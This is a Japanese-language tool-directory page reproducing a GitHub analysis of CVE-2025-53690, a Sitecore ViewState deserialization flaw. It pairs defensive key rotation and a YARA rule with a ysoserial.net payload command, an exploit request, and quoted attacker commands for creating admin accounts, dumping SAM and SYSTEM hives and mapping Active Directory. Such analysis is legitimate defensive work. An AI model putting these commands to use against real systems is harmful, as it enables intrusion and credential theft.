Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-53690-Analysis — これはCVE-2025-53690分析ドキュメントです。 | Kitploit
ツール/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
脆弱性分析エクスプロイトウェブアプリケーション悪用フォレンジックマルウェア分析ペネトレーションテスト学習と教育レッドチーミングインシデントレスポンス
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

これはCVE-2025-53690分析ドキュメントです。

341年前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-53690: Sitecore ViewState Deserialization 脆弱性分析

概要

CVE-2025-53690 は、Sitecore 製品群で発見された ViewState 逆シリアル化脆弱性であり、公開された ASP.NET machine key を悪用してリモートコード実行が可能な致命的なセキュリティ脆弱性です。

基本情報

  • CVE ID: CVE-2025-53690
  • CVSS スコア: 9.0 (Critical)
  • 脆弱性タイプ: 信頼できないデータの逆シリアル化 (CWE-502)
  • 発見日: 2025年9月
  • 公開日: 2025年9月3日
  • 実際の悪用: 2024年12月よりZero-dayとして悪用

影響を受ける製品

  • Sitecore Experience Manager (XM) - 9.0 以下のすべてのバージョン
  • Sitecore Experience Platform (XP) - 9.0 以下のすべてのバージョン
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Active Directory モジュール 1.4 以下

脆弱性詳細分析

根本原因

この脆弱性の核心は 不適切な構成管理 にあります:

  1. サンプル Machine Key の使用: 2017年以前の Sitecore デプロイガイドに含まれていたサンプル ASP.NET machine key が本番環境でそのまま使用されていた
  2. 静的キーの再利用: 複数のデプロイで同一の machine key が繰り返し使用されていた
  3. ViewState 検証のバイパス: 公開されたキーにより ViewState の整合性検証をバイパスできる

ASP.NET ViewState メカニズム

ViewState は ASP.NET の状態管理機能であり:

  • ウェブページの状態を __VIEWSTATE 隠しフィールドに保存
  • Machine key を使用して整合性と機密性を保証
  • サーバーは ViewState を逆シリアル化してページ状態を復元
root@kitploit:~
<!-- web.config 例 -->
<system.web>
    <machineKey 
        validationKey="[64バイトキー]"
        decryptionKey="[48バイトキー]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

攻撃ベクトル

1. 脆弱なエンドポイントの特定

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
特徴: 認証なしでアクセス可能、ViewState を使用

2. 悪意のある ViewState ペイロードの生成

攻撃者は既知の machine key と ysoserial.net を使用して悪意のあるペイロードを生成:

root@kitploit:~
# ysoserial.net 使用例
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[キー]" --validationalg="HMACSHA256" --decryptionkey="[キー]" --decryptionalg="AES"

3. HTTP リクエスト送信

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[悪意のあるペイロード]&__VIEWSTATEGENERATOR=[値]

実際の攻撃事例分析 (Mandiant レポート)

攻撃ライフサイクル

Phase 1: 初期侵入

  • エンドポイント: /sitecore/blocked.aspx
  • 方法: ViewState 逆シリアル化攻撃
  • 権限: NETWORK SERVICE (IIS worker process)
  • ペイロード: WEEPSTEEL 偵察ツール

Phase 2: 偵察と足場構築

root@kitploit:~
# 実行されたコマンド
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

展開されたツール:

  • 7za.exe: ファイル圧縮ツール
  • lfe.ico: EARTHWORM ネットワークトンネリングツール
  • 1.vbs: コマンド実行用 VBScript

Phase 3: 権限昇格

root@kitploit:~
# ローカル管理者アカウント作成
net user asp$ [パスワード] /add
net localgroup administrators asp$ /add

net user sawadmin [パスワード] /add  
net localgroup administrators sawadmin /add

資格情報収集:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Phase 4: 持続性確保

  • RDP アクセス: 作成した管理者アカウントを使用
  • DWAGENT: リモートアクセスツールのインストール (SYSTEM 権限でサービス登録)
  • アカウント設定変更:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Phase 5: 内部偵察

root@kitploit:~
# Domain Controller の特定
nltest /DCLIST:[domain]
nslookup [domain-controller]

# GPO 内の cpassword 検索 (Group Policy Preferences 攻撃)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# BloodHound/SharpHound の実行
sh.exe -c all

Phase 6: 横方向移動

  • 奪取したドメイン管理者アカウントで他のシステムに RDP アクセス
  • EARTHWORM によるネットワークトンネリングでセキュリティを回避

使用されたツール分析

WEEPSTEEL (偵察ツール)

root@kitploit:~
// 収集する情報
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

出力方法: ViewState に偽装してデータを隠蔽

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES暗号化 + base64エンコードされた出力}" />

EARTHWORM (ネットワークトンネリング)

  • SOCKS v5 プロキシサーバー機能
  • ファイアウォール回避とトラフィック隠蔽
  • RDP トラフィックをトンネリングして検出を回避

DWAGENT (リモートアクセス)

  • 合法的なリモート管理ツール
  • SYSTEM 権限でサービス登録
  • 自動起動による持続性確保

SHARPHOUND (AD 偵察)

  • BloodHound 用データ収集ツール
  • Active Directory 環境のマッピング
  • 攻撃経路の特定

防御および緩和策

即時対応事項

root@kitploit:~
<!-- 固有の machine key を生成 -->
<machineKey 
    validationKey="[新しい_64バイト_キー]"
    decryptionKey="[新しい_48バイト_キー]"
    validation="HMACSHA256" 
    decryption="AES" />

セキュリティ強化策

  1. 自動化されたキーローテーション
  2. ViewState MAC 検証の有効化
  3. 構成ファイルの暗号化
  4. ネットワーク分割
  5. 監視の強化

検知ルール

root@kitploit:~
# YARA ルール例 (WEEPSTEEL 検知)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

結論

CVE-2025-53690 は、単純な構成ミスがどのように致命的なセキュリティ脅威につながるかを示す代表的な事例です。この脆弱性を通じて、学習者は実際の APT 攻撃の全ライフサイクルを体験し、現代的な攻撃手法と防御戦略を理解することができます。

参考資料

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
ツールをダウンロード